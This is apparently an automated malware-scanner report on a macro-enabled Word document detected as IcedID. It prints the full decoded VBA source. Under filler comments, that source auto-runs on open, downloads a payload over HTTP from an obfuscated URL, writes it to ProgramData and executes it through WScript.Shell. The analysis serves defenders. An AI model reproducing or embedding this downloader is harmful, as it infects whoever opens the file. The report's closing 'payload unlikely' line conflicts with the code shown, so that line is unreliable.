Verdict: MALICIOUS
Risk score: 230
Heuristics: 6

- ClamAV: Doc.Macro.ICEID1020-9781212-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings). Document contains a VBA project: VBA macros present.
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: Set oknec = CreateObject("Script" + GHXgQ)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: Sub AutoOpen()
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12282 bytes |

SHA-256: f75907f2541a3d6bedcdeee839973f9f5b0a8ec6e37788edaba89e44bf2bf4cb

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "YJWeH"
Sub sfVeF(XFRCW, Optional ByVal eqPPB As String = "c:\programdata\MNpGJ.txt", Optional ByVal GHXgQ As String = "ing.FileSystemObject")
' Railes initially
' Polite finalists quarrymen
' Latches slag purchased
' Bewilder reflectively
' Undervalues wildebeest skirmish eluding overestimated
' Attacker fashioning enclosing
' Choreographing expansions hypothetically
' Abbreviate ethicist floated hatstands
' Banished halved chrysanthemum raster ventricle
' Bosses
' Streets meadow entangle waifs cysts tabloids steeds
' Scatters tilled remotest gainsay
' Softens
' Subordinate prison tallish topologist
' Formless nozzles presupposition bagmen
' Tyrannic cryptic howsoever mirthless
' Insulin earmarking
' Mealy adaptable humanitarian
Set oknec = CreateObject("Script" + GHXgQ)
' Demolishing agitations reiterating
' Diode
' Lazier acid swooned jeopardising
' Adjourns
' Burned sodomites nagging
' Lacs heedless heartbreaks ugliness
' Paeony prettify fainthearted mingle replicate
Set nYrMX = oknec.CreateTextFile(eqPPB)
' Winch again smalltown unlearned
' Pulsations outlawing cork analytic
' Swingers cricketing
' Geologists allocated
nYrMX.WriteLine XFRCW
' Satirised gossamer biliary
' Incapability glycerol necessitating articulations trailer
' Mating wristwatch
' Burps botulism
' Quarrelled bookseller
' Undervalues cruelty proclaims
' Calmest
nYrMX.Close
' Rider maisonette bathhouse typhoon encyclopedic
' Hardening fences slanted
' Bates lambasted pip
' Settler alternation cafeteria
' Boastful attender biased skippered intensively obituaries undistinguished
' Assisted offshore
' Uneasiest unspeakably ninefold
' Sweetness scabs oddness superstitiously
' Polar aspidistra mouthpiece
' Lowspirited apples whooping identity
' Induna pawing absolutely
' Expended mistrustful
' Batmen dukedoms recompenses
' Indemnity syncretic outfoxed apery vorticity taxonomist hoarder
' Trafficked searching flawlessly
' Keynote searched
' Insinuating denomination conditionals
' Noradrenaline goats wapitis transfusion amplitude
' Picaresque
' Knives gilding phenomenologically briers intricately
' Dried burly
' Passant heaters torturer
' Everpresent abscess
' Condor worsens translator
' Deprecating brooches venison
' Slowly worthlessness scopes dreariness streamers
' Gang sleazier opportunist
' Attestation elfin redrawn guessing deepens
' Echo
' Sackful cornet calcify lurker munches
' Impulsion pinkness shiner
' Stagecoaches exemplification snowman thereafter
' Medicinal shrivels renumbering
' Proportioned confessing
' Buttercup refiner analyses
' Barging determine
' Severely randomly diathermy quartiles
' Tolerantly delivery bargains totters candies
' Bobbies killing spit services
' Majolica
End Sub
' Nightwatchman defames founder
' Forefront undifferentiated pried kneaded
' Pigments unboiled
' Doornail croft lifelike protestantism
' Graves occupancies
' Broadens alpacas
' Skip trickier
Sub AutoOpen()
' Aperiodically reconnoitring surlily jellify bleeped oxygen cuddliest
' Sensitisers
' Distrusting impromptu achingly indignantly foreshores interlaced
' Downstream cleanest
' Extortionately smokes sexy
' Warrant blinking garret writings
' Murmurings assiduously beholders
' Ovoid manna
' Disavow
' Intensifying varied
' Busking paddocks quarrymen prints cleanshaven
' Mastership aerofoil telegraphic
' Azalea discontinuation
' Coauthoring
' Volcano impales alveoli miner studying
' Rowed meteor breezing heterodoxy
' Rad trivially bradawl
' Bestknown brainteasing megaton
' Loaf seated clothespegs
' Crime intuited
' Dampening auctioneer
' Frequent transporters actinides trajectory squandered veiled triangulating
' Molehill truncated yes
' Ecosystem vocalisation
' Ambassadors operationally throttles slap discolour
' Rabbiting uprating teabag
Dim qmEVO As New JyFrJ
' Dioxins vertices perpendicular lander
' Corkage
' Underachieving
' Supper brainier insinuating mountains anarchism
' Hindered openers nogging swampiest
' Breeders tweeter
' Defenders bestirred obliteration flannels
' Fantastic stirrer
XFRCW = qmEVO.Ibgof("MSXML2.serverXMLHTTP")
' Seawards durban mishandles wholegrain suggestibility cypresses sloshing
' Flatly lacings
' Druggist marl finitely hatstands canticles cached
' Price perestroika
' Bradycardia aborigines blotch violators confessed
' Interchanging surely elegantly freed
' Jersey sneaks sirloins coalescence
sfVeF ZVToT(XFRCW)
' Principalities
' Unsuited passably benefice eviscerate
' Snooker rho
' Donate acquittance argument
' Piggy boastful dazzling pithiest
' Remonstrations
' Pipit rugged ferny
' Triplets parenthesise
' Rate doodled invitations manicured condole skirts excavator
xHhFv orKrI(0) + "vr32 c:\programdata\MNpGJ.txt", "ws"
End Sub
Function dOcXQ(NbJUS, hRXEd)
' Necessities antidote pyromaniac
' Figurehead change loftiness weanling
' Steepened corresponded bandwagons cadaverous
' Hearttoheart ext
' Responsively barnacles
' Promontory miraculously tiro phrenological stencilled
' Tricycle algebraic hyperbola apogee
dOcXQ = Split(NbJUS, hRXEd)
End Function
Attribute VB_Name = "XqpTk"
' Decisive adumbrate shrewdest
' Psychiatry
' Splendour befuddle unsettle
' Comparators vegetarian fuddle
' Bartering striper
' Pooch paracetamol angora monopolisation
' Obstructively
Function ZVToT(Yeppd)
' Outfits sloughed differently
' Monuments degenerating
' Parlourmaid contributions fridays aurally
' Bedouins exogenous wobbled
' Protuberances repined lexically
' Incautiously reformable abruptly
ZVToT = StrConv(Yeppd, vbUnicode)
' Tortuous
' Springy town equating
' Trundling taipei tenures cattery
' Crevices
' Dimes thorax
End Function
' Hearings interject fiefs
' Crises
' Grouper electrically repertory confiscations
' Industrial scrabbling obsessiveness rings
Function uXtke()
' Radiogalaxies frogs gushes
' Ovulation
' Crotchetiness pity
' Exclude avoiding unappealing assessable safeness customs perspicacious invoice
' Elan developments allergens amplifying shrewdly
' Authenticating embargo
' Subroutines bevelling
' Chapters disciplined
' Deliverable interventionist auras unplug
' Resignation dispositions hauntingly els
With ActiveDocument.shapes(1)
uXtke = .AlternativeText
End With
End Function
' Semites affiliates cicada tactful
' Opponents
' Scrawnier graciousness balustrades
' Knotted zambia worried
' Assent gables
Function orKrI(QMRnS)
' Citizen chemise incredibly iconographic breakers
' Scurry deaconess dejected daunting
' Participative diaphanous
' Beckon congresses cyclist taxpayers aperture
' Hieroglyphic fez circumcision
' Bow secretively blown
' Defaulter exposed
' Sunless personalisation instigator
' Maudlin dependence dogmatism mutuality
' Wastages spawning deepfried pellets
' Invigilating emblems pyrotechnics metalworking abraham convertor
' Sheaves maisonette unspent neurotically punk
' Impunity competing opportunism unorthodox
WFuMz = uXtke()
MyDhx = dOcXQ(WFuMz, "###")
eJjiR = MyDhx(QMRnS)
orKrI = eJjiR
End Function
Attribute VB_Name = "JyFrJ"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
Dim i As Integer
Dim StrNew As String
Dim strOld As String
strOld = Trim(Text)
For i = 1 To Len(strOld)
StrNew = Mid(strOld, i, 1) & StrNew
Next i
Reverse = StrNew
End Function
' Moors commentaries negotiates
' Heralding centimes
' Bartender turfs accomplices bliss sits
' Piranhas downstairs oceanographic
' Crutch regenerate
' Sharp predictive
' Rigidly perennial
Function Ibgof(OlcFW)
' Habituated gumboots endangering
' Tawdry
' Columnist skimped castors presumable boggles flexibly
' Surplice voluntary sooty misremembering selfdiscipline rainfall
' Ecliptic bunnies fijians depicts
' Looks sauces synthesising
' Rubicon mechanistic eggheads retrain
Dim hyiyv As Object
' Newfound
' Manageable unorthodoxy wordprocessing
' Anion internationalists
' Foundations interleaves vamper wretchedness impossibly
' Shotgun friendlies symbolical
' Demo
' Cuticles glutton recording lopsided
' Odiums inhumanity expunges drowsier
' Sauciness supplicant injudiciously neglecting
' Nonviolence
' Pedimented
Set hyiyv = CreateObject(OlcFW)
' Fumigating hopelessly probability
' Convulsively
' Church governess
' Ruefully facetiousness haltered profusely
' Occurrences
' Blubbering confuse lobbyists malta
' Tautologous swipe walkabouts
' Applied antenatal addles newt
' Exact unwinds ingathered hardship amortise
' Gazetteer immutability musician
' Tensely subset toughens replenishment surfs
' Eaters parabola
' Chin raise blackish insoluble
' Remix lipid urgings doe
' Clowning grimiest conspecific yawned translation vibrantly
' Validates carp hankers clips
' Socialising proofed
' Output toilette concordance manslaughter leniently
' Houseboat biographies respect indigo
' Withholds
' Monarchs barbaric findings
MajCT = orKrI(1)
' Bahamas islanders
' Falseness
' Slugged unbounded spiky motivating intimidate disposer
' Quantised chesterfield doggedness countess
' Sapper weld originated
hyiyv.Open "GET", Reverse(MajCT), False
' Miles tripod itemise counsellor
' Eeriest mod congratulates impoverishment
' Rabbi poises stapes
' Was sharing managers
' Emotionalism violators catatonic displays
' Tori seizing phew
hyiyv.Send
' Plaiting scrimped
' Beech describe
' Illogic sinistral etymology activism apostrophes requital
' Gasometer protozoan nailed
' Garbage
Ibgof = hyiyv.responsebody
End Function
Attribute VB_Name = "kYuTd"
Sub xHhFv(Owlxd, CnjrD)
' Glued brewer champagnes cloaked wheatears
' Tinkled chaperoned
' Gusts poop allays gavotte
' Tons juxtaposition
' Multiplexers maw geologist sundries
' Retrospective repulsively bouquets retract
' Mitred priggishly
Set JVhlx = CreateObject(CnjrD + "cript.shell")
' Evening smarts
' Westward plungers peacemaking thrillers
' Yetis magnums bouffant january
' Trestle unpreparedness rends wapitis foregrounding maul
' Relish glyphs categorises undeclared cloudscapes
' Blacklists spooled redrafting scimitars wetsuit saddlebags
' Postboxes aliquots sequence amusements
' Accelerators returnees retributive
' Secretive secularist elf restaurateurs
' Ogled
' Greatgrandmothers unsuspected printers admen pined
' Stumbles livening
' Standard accessories combines acclaim
' Amethystine spate crisper overreacted
' Grueling tables aches
' Piteous teetotallers purred subtlest
' Spotting hypnotherapists phospholipids
' Peakiness agonies
' Architrave nationalising raiment compartment
' Quart incinerate hydrous
' Tang bogey pyrite preview mice malayan
' Reformatting chequerboard wearily judicious thomas
' Belated beadle scales
' Magnate magnanimous enjoined cuboid authority
' Cytology reddens colloquia dozes undecided biotic
' Gaga seismologist
' Warplanes mull
' Projectionist scotch presumes
' Tuneless smacker
' Struggling blundered
' Weir clan philosophical mainline
' Lonesome reciprocation commission element exfoliation toxic rarest
' Bagpipe sandpaper shoppers retardation
' Meditates
' Tory
' Canteen temporary patriarchal venom
' Patriots neonates
' Sparking overlaying applet weasel fords
' Card vocalisations postponements cross-bun conspired
' Crosswind moleskin imprimatur alright
' Drew litany arrant
' Dolerite commemorations
' Coverlets gamete chuntering transistorised
' Moorland courting ringless finders
' Pacified endeared networks
JVhlx.exec Owlxd
' Prolix squid environmentally boston garottes
' Sandals pacifying adulation
' Rota
' Keyboardist
End Sub
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 45568 bytes |

SHA-256: a4d1352f9c7dd599d2b2d2a0ffe0dc582bfa245fe08b2a9472c2031d5f8d70b4

Detection: ClamAV: Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload: unlikely